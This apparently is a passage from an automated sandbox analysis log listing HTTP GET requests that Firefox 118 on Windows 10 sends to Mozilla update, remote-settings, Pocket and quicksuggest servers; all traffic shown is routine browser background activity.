Source: global traffic HTTP traffic detected: GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2023-10-29-15-54-12.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveIf-Modified-Since: Sat, 09 Sep 2023 15:54:13 GMTIf-None-Match: "defaf397a2137227b32599694fdb5208"
Source: global traffic HTTP traffic detected: GET /v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb HTTP/1.1Host: location.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/monitor/collections/changes/changeset?_expected=0 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=US&count=30 HTTP/1.1Host: getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /desktop/v1/recommendations?locale=en-US&region=US&count=30 HTTP/1.1Host: firefox-api-proxy.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brconsumer_key: 94110-6d5ff7a89d72c869766af0e0Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/search-telemetry-v2/changeset?_expected=1718041017650&_since=%221694014137037%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-aliveIf-Modified-Since: Fri, 25 Mar 2022 17:45:46 GMTIf-None-Match: "1648230346554"
Source: global traffic HTTP traffic detected: GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml?force=1 HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /chains/remote-settings.content-signature.mozilla.org-2024-08-29-13-50-59.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/monitor/collections/changes/changeset?collection=quicksuggest&bucket=main&_expected=0 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-search-detection%40mozilla.com%2Cgoogle%40search.mozilla.org%2Camazondotcom%40search.mozilla.org%2Cwikipedia%40search.mozilla.org%2Cbing%40search.mozilla.org%2Cddg%40search.mozilla.org%2Cfirefox-compact-light%40mozilla.org%2Cfirefox-compact-dark%40mozilla.org%2Cfirefox-alpenglow%40mozilla.org%2Cebay%40search.mozilla.org&lang=en-US HTTP/1.1Host: services.addons.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/url-classifier-skip-urls/changeset?_expected=1720004688246&_since=%221606870304609%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/quicksuggest/changeset?_expected=1721842166733 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fimgix.bustle.com%2Fuploads%2Fimage%2F2024%2F7%2F24%2Fd57cdb8b%2Fquitcooking_social.jpg%3Fw%3D1200%26h%3D630%26fit%3Dcrop%26crop%3Dfaces%26fm%3Djpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2Ff85f50edcf894021a38860edd7f5438c.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82dcc6be43bb872a%2F191%3A100%2Fw_1280%2Cc_limit%2FAMOC_Laerke_011.jpg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba27004c947fdb8667ce4914d41c8.png HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /CAP5k4gWqcBGwir7bEEmBWveLMtvldFu-y_kyO3txFA=.9991.jpg HTTP/1.1Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fd1n0c1ufntxbvh.cloudfront.net%2Fphoto%2Feabcdc61%2F98254%2F1200x%2F HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /m6BvG6Rcntmafem2bLfA5IktKm1SEwqO2E4XIjaC12c=.10862.jpg HTTP/1.1Host: tiles-cdn.prod.ads.prod.webservices.mozgcp.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: no-corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb1da8a8e-07d7-4788-a750-b444d5b94049.jpeg HTTP/1.1Host: img-getpocket.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: image/avif,image/webp,*/*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brOrigin: nullConnection: keep-aliveSec-Fetch-Dest: imageSec-Fetch-Mode: corsSec-Fetch-Site: cross-site
Source: global traffic HTTP traffic detected: GET /update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/buckets/main/collections/nimbus-desktop-experiments/changeset?_expected=1721935300722&_since=%221696422861896%22 HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: application/jsonConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/default/default/update.xml HTTP/1.1Host: aus5.mozilla.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /chains/202402/aus.content-signature.mozilla.org-2024-09-02-22-40-36.chain HTTP/1.1Host: content-signature-2.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/32706371-5612-48cb-8cf8-6a1c97906e3c HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/bea0c2fe-9c8c-4351-9ede-4051baa1ed47.json HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/8e264f27-207e-4cfd-84c9-8ea2fce78243 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/20f6c216-2267-4b1e-af58-22d224043fe9 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/4390d749-61a9-4b7a-ac8f-88a2a8145c59 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/5e1b56db-af05-453a-83ac-7c094f25918d HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/3012260d-8f8d-4863-9be6-03970e37af68 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/dff96728-c23d-4f24-91c7-9233d01352d4 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/7b0c093e-1c31-409b-a323-78ca82e5f600 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/25043d3b-9aeb-4f57-a7da-874ab81697bd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/a960129b-64a7-439d-a8e6-f8d201e0b44e HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/437e6fa9-e584-4be9-8a1f-e4951809fd17 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/118946fc-cb7b-4340-a9e0-a565a5c8876b HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/05f7ba7a-f7cf-4288-a89f-8fad6970a3b8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/f11c1bba-0d2e-44d8-acb1-e375719dd8b8 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/d9c6e436-11b1-4ae1-8d6f-e109d59d5069 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/41a4b1d8-9773-4011-ab45-8d749a67cebd HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /main-workspace/quicksuggest/16ab4d01-9f0c-4fb9-bc87-cfcbe230a838 HTTP/1.1Host: firefox-settings-attachments.cdn.mozilla.netUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /v1/ HTTP/1.1Host: firefox.settings.services.mozilla.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brConnection: keep-alive
